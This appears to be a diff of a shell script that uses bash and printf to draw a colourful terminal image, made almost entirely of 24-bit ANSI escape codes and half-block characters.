\e[48;2;255;147;0m\e[38;2;254;147;0m▄\e[48;2;255;147;0m\e[38;2;250;144;0m▄\e[48;2;255;147;0m\e[38;2;238;146;1m▄\e[48;2;254;147;0m\e[38;2;170;117;4m▄\e[48;2;252;147;0m\e[38;2;78;65;5m▄\e[48;2;239;144;1m\e[38;2;36;71;11m▄\e[48;2;220;136;2m\e[38;2;41;122;21m▄\e[48;2;193;124;2m\e[38;2;59;179;31m▄\e[48;2;178;119;4m\e[38;2;69;210;35m▄\e[48;2;129;104;6m\e[38;2;73;219;37m▄\e[48;2;67;87;10m\e[38;2;73;219;37m▄\e[48;2;61;106;15m\e[38;2;73;218;37m▄\e[48;2;52;126;21m\e[38;2;73;218;37m▄\e[48;2;52;150;25m\e[38;2;73;218;37m▄\e[48;2;58;177;30m\e[38;2;73;218;37m▄\e[48;2;63;194;33m\e[38;2;73;218;37m▄\e[48;2;66;204;34m\e[38;2;73;218;37m▄\e[48;2;69;212;36m\e[38;2;73;218;37m▄\e[48;2;72;217;36m\e[38;2;73;218;37m▄\e[48;2;72;219;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;74;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;219;37m\e[38;2;73;218;37m▄\e[48;2;72;214;36m\e[38;2;73;218;37m▄\e[48;2;68;207;35m\e[38;2;73;218;37m▄\e[48;2;65;197;34m\e[38;2;73;218;37m▄\e[48;2;61;185;32m\e[38;2;73;218;37m▄\e[48;2;51;157;27m\e[38;2;73;218;37m▄\e[48;2;41;125;21m\e[38;2;73;218;37m▄\e[48;2;40;106;18m\e[38;2;73;218;37m▄\e[48;2;75;92;10m\e[38;2;73;218;37m▄\e[48;2;76;85;10m\e[38;2;73;219;37m▄\e[48;2;112;94;7m\e[38;2;72;216;36m▄\e[48;2;162;113;5m\e[38;2;64;194;33m▄\e[48;2;219;131;0m\e[38;2;50;152;26m▄\e[48;2;231;138;1m\e[38;2;30;65;14m▄\e[48;2;252;147;0m\e[38;2;106;71;5m▄\e[48;2;97;61;4m\e[38;2;30;31;7m▄\e[0m - \e[48;2;186;108;0m\e[38;2;185;108;0m▄\e[48;2;255;147;0m\e[38;2;254;148;0m▄\e[48;2;255;147;0m\e[38;2;247;144;0m▄\e[48;2;255;147;0m\e[38;2;188;113;1m▄\e[48;2;255;147;0m\e[38;2;110;100;8m▄\e[48;2;248;147;0m\e[38;2;72;136;20m▄\e[48;2;206;124;1m\e[38;2;62;175;29m▄\e[48;2;115;81;4m\e[38;2;67;204;34m▄\e[48;2;55;92;13m\e[38;2;72;217;36m▄\e[48;2;60;157;26m\e[38;2;73;218;37m▄\e[48;2;66;195;32m\e[38;2;73;218;37m▄\e[48;2;70;212;35m\e[38;2;73;218;37m▄\e[48;2;72;215;36m\e[38;2;73;218;37m▄\e[48;2;73;217;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;71;210;37m\e[38;2;71;214;37m▄\e[48;2;58;142;37m\e[38;2;57;136;37m▄\e[48;2;51;109;39m\e[38;2;54;109;40m▄\e[48;2;36;76;26m\e[38;2;38;71;31m▄\e[0m - \e[48;2;73;63;12m\e[38;2;24;46;20m▄\e[48;2;89;67;7m\e[38;2;54;120;38m▄\e[48;2;67;119;19m\e[38;2;66;192;35m▄\e[48;2;61;177;29m\e[38;2;73;217;37m▄\e[48;2;71;213;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;71;214;35m\e[38;2;42;129;21m▄\e[48;2;43;131;22m\e[38;2;4;10;2m▄\e[48;2;37;111;19m\e[38;2;4;10;2m▄\e[48;2;60;180;30m\e[38;2;7;22;3m▄\e[48;2;73;218;37m\e[38;2;62;187;31m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m\e[38;2;72;217;36m▄\e[48;2;69;208;35m\e[38;2;20;61;10m▄\e[48;2;43;129;22m\e[38;2;4;11;2m▄\e[48;2;38;116;19m\e[38;2;3;8;1m▄\e[48;2;64;192;32m\e[38;2;19;57;10m▄\e[48;2;73;218;37m\e[38;2;73;219;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;214;36m\e[38;2;71;213;36m▄\e[48;2;55;130;37m\e[38;2;55;123;38m▄\e[48;2;54;108;41m\e[38;2;56;110;44m▄\e[48;2;35;60;30m\e[38;2;35;57;30m▄\e[0m - \e[48;2;37;68;29m\e[38;2;38;61;33m▄\e[48;2;58;132;39m\e[38;2;62;134;45m▄\e[48;2;64;179;36m\e[38;2;55;129;37m▄\e[48;2;72;217;36m\e[38;2;71;210;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;27;82;14m\e[38;2;59;178;30m▄\e[48;2;4;11;3m\e[38;2;3;9;1m▄\e[48;2;0;0;0m\e[38;2;8;18;4m▄\e[48;2;1;3;1m\e[38;2;4;12;2m▄\e[48;2;36;112;19m\e[38;2;54;163;27m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;70;210;36m\e[38;2;72;217;36m▄\e[48;2;4;11;1m\e[38;2;9;28;4m▄\e[48;2;0;0;0m\e[38;2;6;16;3m▄\e[48;2;1;3;1m\e[38;2;6;15;3m▄\e[48;2;13;39;6m\e[38;2;32;94;15m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;70;207;36m\e[38;2;67;196;36m▄\e[48;2;52;110;38m \e[48;2;57;101;47m\e[38;2;56;90;47m▄\e[48;2;36;55;31m\e[38;2;38;58;33m▄\e[0m - \e[48;2;40;63;35m\e[38;2;43;67;38m▄\e[48;2;61;117;48m\e[38;2;45;80;38m▄\e[48;2;54;114;39m\e[38;2;52;110;38m▄\e[48;2;64;177;36m\e[38;2;59;150;37m▄\e[48;2;72;217;36m\e[38;2;72;214;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;217;36m\e[38;2;73;218;37m▄\e[48;2;61;182;30m\e[38;2;73;218;37m▄\e[48;2;45;135;22m\e[38;2;73;218;37m▄\e[48;2;58;174;29m\e[38;2;73;218;37m▄\e[48;2;72;217;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;71;212;35m\e[38;2;72;216;36m▄\e[48;2;34;101;17m\e[38;2;11;32;5m▄\e[48;2;34;101;17m\e[38;2;1;2;1m▄\e[48;2;34;98;18m\e[38;2;1;3;1m▄\e[48;2;35;101;18m\e[38;2;1;1;1m▄\e[48;2;35;100;17m\e[38;2;1;3;1m▄\e[48;2;57;170;29m\e[38;2;56;168;28m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;217;36m\e[38;2;72;218;36m▄\e[48;2;66;197;33m\e[38;2;72;217;36m▄\e[48;2;46;139;23m\e[38;2;73;217;37m▄\e[48;2;54;163;27m\e[38;2;72;217;37m▄\e[48;2;71;212;36m\e[38;2;72;217;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;217;37m\e[38;2;70;204;36m▄\e[48;2;60;158;37m\e[38;2;53;122;37m▄\e[48;2;52;103;38m\e[38;2;52;104;40m▄\e[48;2;33;54;28m\e[38;2;21;34;18m▄\e[48;2;46;70;41m\e[38;2;49;76;44m▄\e[0m - \e[48;2;49;76;44m\e[38;2;51;78;45m▄\e[48;2;32;51;28m\e[38;2;43;65;37m▄\e[48;2;61;125;45m\e[38;2;81;124;71m▄\e[48;2;54;124;38m\e[38;2;53;113;40m▄\e[48;2;68;202;36m\e[38;2;60;156;37m▄\e[48;2;73;218;37m\e[38;2;72;215;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m\e[38;2;73;216;37m▄\e[48;2;73;217;37m\e[38;2;93;205;61m▄\e[48;2;79;213;44m\e[38;2;121;189;95m▄\e[48;2;85;210;51m\e[38;2;132;184;108m▄\e[48;2;82;211;47m\e[38;2;121;191;93m▄\e[48;2;73;217;37m\e[38;2;85;210;52m▄\e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;37;111;20m\e[38;2;71;214;36m▄\e[48;2;1;2;0m\e[38;2;44;128;22m▄\e[48;2;2;4;2m\e[38;2;15;39;8m▄\e[48;2;1;1;1m\e[38;2;29;82;14m▄\e[48;2;13;37;7m\e[38;2;68;204;34m▄\e[48;2;70;210;35m\e[38;2;73;218;37m▄\e[48;2;73;217;37m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;217;37m\e[38;2;74;216;38m▄\e[48;2;82;211;47m\e[38;2;118;191;90m▄\e[48;2;100;200;70m\e[38;2;132;185;108m▄\e[48;2;103;201;72m\e[38;2;127;187;101m▄\e[48;2;98;203;67m\e[38;2;125;189;100m▄\e[48;2;85;209;52m\e[38;2;116;192;88m▄\e[48;2;73;217;37m\e[38;2;80;211;44m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;217;36m\e[38;2;68;200;35m▄\e[48;2;63;170;35m\e[38;2;54;125;36m▄\e[48;2;51;103;38m\e[38;2;51;99;38m▄\e[48;2;49;101;36m\e[38;2;22;45;17m▄\e[48;2;30;47;26m\e[38;2;45;69;39m▄\e[48;2;51;78;45m \e[0m - \e[48;2;51;78;45m \e[48;2;49;75;43m\e[38;2;51;78;45m▄\e[48;2;30;38;27m\e[38;2;39;59;35m▄\e[48;2;63;123;49m\e[38;2;71;110;62m▄\e[48;2;54;121;37m\e[38;2;56;119;40m▄\e[48;2;68;198;37m\e[38;2;60;158;37m▄\e[48;2;73;218;37m\e[38;2;71;216;36m▄\e[48;2;73;217;37m\e[38;2;73;216;38m▄\e[48;2;91;206;58m\e[38;2;110;196;81m▄\e[48;2;122;191;95m\e[38;2;126;188;100m▄\e[48;2;128;186;102m\e[38;2;130;187;104m▄\e[48;2;140;180;116m\e[38;2;128;187;103m▄\e[48;2;126;188;100m\e[38;2;106;197;76m▄\e[48;2;96;202;64m\e[38;2;75;215;39m▄\e[48;2;73;217;37m\e[38;2;72;218;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;74;220;37m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;74;217;38m\e[38;2;73;217;37m▄\e[48;2;114;194;86m\e[38;2;76;215;40m▄\e[48;2;142;178;121m\e[38;2;94;205;62m▄\e[48;2;150;176;129m\e[38;2;109;196;81m▄\e[48;2;142;180;120m\e[38;2;95;203;63m▄\e[48;2;116;193;88m\e[38;2;76;214;41m▄\e[48;2;78;213;44m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;67;196;36m▄\e[48;2;71;209;37m\e[38;2;60;154;36m▄\e[48;2;59;152;36m\e[38;2;57;138;37m▄\e[48;2;52;110;38m\e[38;2;56;130;37m▄\e[48;2;51;104;38m\e[38;2;30;71;21m▄\e[48;2;20;31;17m\e[38;2;45;69;39m▄\e[48;2;50;78;44m\e[38;2;51;78;45m▄\e[48;2;51;78;45m \e[0m - \e[48;2;51;78;45m\e[38;2;28;43;24m▄\e[48;2;51;78;45m\e[38;2;43;64;38m▄\e[48;2;51;78;45m\e[38;2;52;79;46m▄\e[48;2;34;53;30m\e[38;2;46;71;41m▄\e[48;2;64;124;48m\e[38;2;49;106;36m▄\e[48;2;53;115;38m\e[38;2;57;124;40m▄\e[48;2;63;175;36m\e[38;2;55;126;38m▄\e[48;2;73;217;37m\e[38;2;66;186;36m▄\e[48;2;89;208;56m\e[38;2;73;217;37m▄\e[48;2;111;195;82m\e[38;2;75;215;40m▄\e[48;2;109;197;80m\e[38;2;74;216;38m▄\e[48;2;85;209;52m\e[38;2;73;218;36m▄\e[48;2;73;216;37m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;217;37m\e[38;2;73;218;37m▄\e[48;2;73;217;37m\e[38;2;73;218;37m▄\e[48;2;73;217;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m\e[38;2;71;214;36m▄\e[48;2;71;212;36m\e[38;2;63;172;36m▄\e[48;2;63;174;35m\e[38;2;57;138;37m▄\e[48;2;58;146;36m\e[38;2;57;137;38m▄\e[48;2;58;139;37m\e[38;2;57;138;37m▄\e[48;2;58;138;37m\e[38;2;54;128;35m▄\e[48;2;50;117;34m\e[38;2;20;44;14m▄\e[48;2;20;32;17m\e[38;2;39;61;34m▄\e[48;2;51;77;44m\e[38;2;45;69;40m▄\e[48;2;51;78;45m\e[38;2;45;69;40m▄\e[48;2;51;78;45m\e[38;2;49;75;43m▄\e[0m - \e[48;2;84;151;67m\e[38;2;98;177;78m▄\e[48;2;43;80;34m\e[38;2;98;177;78m▄\e[48;2;22;39;19m\e[38;2;98;178;78m▄\e[48;2;43;67;38m\e[38;2;81;148;64m▄\e[48;2;40;70;33m\e[38;2;44;78;36m▄\e[48;2;54;127;36m\e[38;2;21;47;15m▄\e[48;2;55;120;39m\e[38;2;54;117;39m▄\e[48;2;56;133;37m\e[38;2;59;133;40m▄\e[48;2;71;211;36m\e[38;2;61;164;37m▄\e[48;2;73;217;36m\e[38;2;71;211;36m▄\e[48;2;73;218;37m\e[38;2;72;218;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;72;217;36m▄\e[48;2;73;218;37m\e[38;2;67;203;34m▄\e[48;2;68;194;37m\e[38;2;40;116;21m▄\e[48;2;58;142;36m\e[38;2;8;21;5m▄\e[48;2;49;120;31m\e[38;2;6;10;5m▄\e[48;2;25;59;16m\e[38;2;73;108;65m▄\e[48;2;15;33;11m\e[38;2;95;157;79m▄\e[48;2;12;25;9m\e[38;2;97;175;77m▄\e[48;2;21;32;19m\e[38;2;99;179;79m▄\e[48;2;23;35;19m\e[38;2;98;178;78m▄\e[48;2;20;34;17m\e[38;2;98;178;78m▄\e[48;2;13;24;11m\e[38;2;98;178;78m▄\e[48;2;16;26;14m\e[38;2;98;177;78m▄\e[0m - \e[48;2;97;176;77m\e[38;2;58;103;46m▄\e[48;2;98;177;78m\e[38;2;94;170;75m▄\e[48;2;98;177;78m\e[38;2;99;179;79m▄\e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;97;176;77m\e[38;2;98;177;78m▄\e[48;2;91;165;72m\e[38;2;98;177;78m▄\e[48;2;55;100;44m\e[38;2;98;177;78m▄\e[48;2;15;27;10m\e[38;2;92;168;73m▄\e[48;2;24;46;18m\e[38;2;76;138;61m▄\e[48;2;73;154;53m\e[38;2;54;96;43m▄\e[48;2;74;213;39m\e[38;2;24;48;18m▄\e[48;2;74;222;37m\e[38;2;20;55;11m▄\e[48;2;73;217;37m\e[38;2;31;91;16m▄\e[48;2;73;218;37m\e[38;2;49;145;24m▄\e[48;2;73;218;37m\e[38;2;68;201;35m▄\e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;74;220;37m▄\e[48;2;73;218;37m\e[38;2;73;219;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m\e[38;2;73;220;37m▄\e[48;2;73;218;37m\e[38;2;72;214;37m▄\e[48;2;73;218;37m\e[38;2;63;187;32m▄\e[48;2;72;217;36m\e[38;2;41;120;22m▄\e[48;2;74;222;36m\e[38;2;21;52;13m▄\e[48;2;67;203;34m\e[38;2;39;62;34m▄\e[48;2;40;117;21m\e[38;2;64;103;54m▄\e[48;2;14;43;7m\e[38;2;72;126;57m▄\e[48;2;4;12;2m\e[38;2;87;156;69m▄\e[48;2;25;45;21m\e[38;2;97;174;78m▄\e[48;2;71;124;57m\e[38;2;99;177;80m▄\e[48;2;97;168;78m\e[38;2;94;170;75m▄\e[48;2;96;175;77m\e[38;2;103;177;84m▄\e[48;2;98;176;79m\e[38;2;109;183;90m▄\e[48;2;100;178;80m\e[38;2;112;185;94m▄\e[48;2;100;177;80m\e[38;2;111;184;92m▄\e[48;2;99;177;80m\e[38;2;107;182;89m▄\e[48;2;98;177;78m\e[38;2;105;182;85m▄\e[48;2;98;177;78m\e[38;2;103;180;83m▄\e[48;2;98;177;78m\e[38;2;99;177;79m▄\e[0m - \e[48;2;99;106;96m\e[38;2;254;254;254m▄\e[48;2;54;79;47m\e[38;2;236;236;236m▄\e[48;2;72;123;60m\e[38;2;134;134;134m▄\e[48;2;97;176;78m\e[38;2;65;87;60m▄\e[48;2;98;177;78m\e[38;2;73;130;59m▄\e[48;2;98;177;78m\e[38;2;91;165;72m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;96;172;77m\e[38;2;98;177;78m▄\e[48;2;82;147;65m\e[38;2;98;177;78m▄\e[48;2;66;116;52m\e[38;2;98;177;78m▄\e[48;2;46;78;38m\e[38;2;98;177;78m▄\e[48;2;27;51;20m\e[38;2;98;177;78m▄\e[48;2;28;60;20m\e[38;2;94;169;74m▄\e[48;2;28;67;19m\e[38;2;86;155;69m▄\e[48;2;34;96;19m\e[38;2;69;123;54m▄\e[48;2;42;126;21m\e[38;2;48;86;39m▄\e[48;2;51;148;27m\e[38;2;36;64;28m▄\e[48;2;55;164;28m\e[38;2;26;46;20m▄\e[48;2;60;180;30m\e[38;2;23;39;18m▄\e[48;2;62;186;31m\e[38;2;21;40;17m▄\e[48;2;61;181;31m\e[38;2;19;36;16m▄\e[48;2;67;176;40m\e[38;2;18;32;14m▄\e[48;2;63;173;35m\e[38;2;23;36;19m▄\e[48;2;56;168;29m\e[38;2;27;42;23m▄\e[48;2;53;160;27m\e[38;2;29;45;24m▄\e[48;2;44;133;22m\e[38;2;30;53;25m▄\e[48;2;34;102;17m\e[38;2;52;89;43m▄\e[48;2;20;60;10m\e[38;2;88;148;71m▄\e[48;2;24;47;19m\e[38;2;97;171;78m▄\e[48;2;34;62;27m\e[38;2;98;177;78m▄\e[48;2;55;99;44m\e[38;2;98;177;78m▄\e[48;2;80;144;64m\e[38;2;98;177;78m▄\e[48;2;99;176;79m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;99;177;79m▄\e[48;2;99;177;79m\e[38;2;96;172;76m▄\e[48;2;99;175;79m\e[38;2;85;151;68m▄\e[48;2;95;169;76m\e[38;2;72;121;60m▄\e[48;2;109;180;92m\e[38;2;37;57;32m▄\e[48;2;100;159;85m\e[38;2;38;41;36m▄\e[48;2;72;107;62m\e[38;2;74;74;74m▄\e[48;2;44;65;38m\e[38;2;134;134;134m▄\e[48;2;31;48;27m\e[38;2;200;200;200m▄\e[48;2;31;48;26m\e[38;2;226;226;226m▄\e[48;2;31;52;25m\e[38;2;205;205;205m▄\e[48;2;41;71;34m\e[38;2;170;170;170m▄\e[48;2;59;97;50m\e[38;2;142;142;142m▄\e[0m - \e[48;2;95;106;94m\e[38;2;253;253;253m▄\e[48;2;81;137;65m\e[38;2;243;243;243m▄\e[48;2;91;166;73m\e[38;2;182;185;181m▄\e[48;2;95;174;76m\e[38;2;61;73;59m▄\e[48;2;98;177;78m\e[38;2;33;66;26m▄\e[48;2;98;177;78m\e[38;2;81;143;65m▄\e[48;2;98;177;78m\e[38;2;102;182;81m▄\e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;99;179;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;97;177;77m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;176;78m▄\e[48;2;98;177;78m\e[38;2;99;179;78m▄\e[48;2;98;177;78m\e[38;2;93;169;74m▄\e[48;2;98;177;78m\e[38;2;56;106;44m▄\e[48;2;96;174;77m\e[38;2;16;31;13m▄\e[48;2;68;126;54m\e[38;2;58;58;58m▄\e[48;2;28;50;23m\e[38;2;180;180;180m▄\e[48;2;20;22;20m\e[38;2;240;240;240m▄\e[48;2;86;85;86m\e[38;2;253;253;253m▄\e[48;2;199;199;199m\e[38;2;255;255;255m▄ \e[0m - \e[48;2;146;147;145m\e[38;2;254;254;254m▄\e[48;2;41;52;39m\e[38;2;242;242;242m▄\e[48;2;39;76;30m\e[38;2;192;192;192m▄\e[48;2;73;136;57m\e[38;2;132;134;132m▄\e[48;2;90;162;72m\e[38;2;96;100;95m▄\e[48;2;99;175;79m\e[38;2;60;69;58m▄\e[48;2;98;177;78m\e[38;2;46;59;43m▄\e[48;2;98;177;78m\e[38;2;32;51;27m▄\e[48;2;98;178;78m\e[38;2;28;50;23m▄\e[48;2;98;178;78m\e[38;2;28;55;22m▄\e[48;2;98;178;78m\e[38;2;35;64;28m▄\e[48;2;98;177;78m\e[38;2;41;75;33m▄\e[48;2;98;177;78m\e[38;2;50;89;41m▄\e[48;2;98;177;77m\e[38;2;54;89;45m▄\e[48;2;98;177;77m\e[38;2;53;89;44m▄\e[48;2;98;177;78m\e[38;2;49;86;39m▄\e[48;2;98;177;78m\e[38;2;45;83;36m▄\e[48;2;98;177;78m\e[38;2;40;74;32m▄\e[48;2;98;177;78m\e[38;2;35;64;28m▄\e[48;2;98;178;78m\e[38;2;39;60;33m▄\e[48;2;90;163;71m\e[38;2;55;61;53m▄\e[48;2;53;97;41m\e[38;2;111;111;111m▄\e[48;2;24;44;19m\e[38;2;186;186;186m▄\e[48;2;36;41;35m\e[38;2;242;242;242m▄\e[48;2;132;131;132m\e[38;2;255;255;255m▄\e[0m - '"; - + /bin/bash -c "printf ' + \e[38;2;26;43;21m▄\e[38;2;58;91;50m▄\e[48;2;116;117;116m\e[38;2;68;119;56m▄\e[48;2;98;98;98m\e[38;2;86;143;70m▄\e[48;2;98;98;98m\e[38;2;100;153;87m▄\e[48;2;63;65;63m\e[38;2;102;164;86m▄\e[48;2;46;49;44m\e[38;2;98;168;79m▄\e[48;2;43;45;43m\e[38;2;91;155;75m▄\e[48;2;61;62;61m\e[38;2;78;137;63m▄\e[48;2;102;101;102m\e[38;2;64;112;52m▄\e[0m\e[38;2;38;67;32m▄\e[38;2;20;35;16m▄\e[38;2;10;20;8m▄\e[38;2;15;21;13m▄\e[0m + \e[38;2;49;80;41m▄\e[38;2;73;133;59m▄\e[48;2;20;21;20m\e[38;2;91;163;72m▄\e[48;2;14;27;12m\e[38;2;96;174;76m▄\e[48;2;51;92;41m\e[38;2;98;177;78m▄\e[48;2;86;155;68m\e[38;2;98;177;78m▄\e[48;2;96;173;77m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;97;175;76m\e[38;2;98;177;78m▄\e[48;2;93;168;74m\e[38;2;98;177;78m▄\e[48;2;99;163;83m\e[38;2;97;177;77m▄\e[48;2;99;151;86m\e[38;2;98;177;78m▄\e[48;2;35;57;29m\e[38;2;98;176;78m▄\e[48;2;19;21;19m\e[38;2;94;169;75m▄\e[0m\e[38;2;70;125;56m▄\e[0m + \e[38;2;42;65;36m▄\e[38;2;62;106;52m▄\e[48;2;94;95;94m\e[38;2;86;152;70m▄\e[48;2;57;72;53m\e[38;2;96;174;77m▄\e[48;2;57;96;47m\e[38;2;98;177;78m▄\e[48;2;78;136;62m\e[38;2;98;177;78m▄\e[48;2;95;167;76m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m 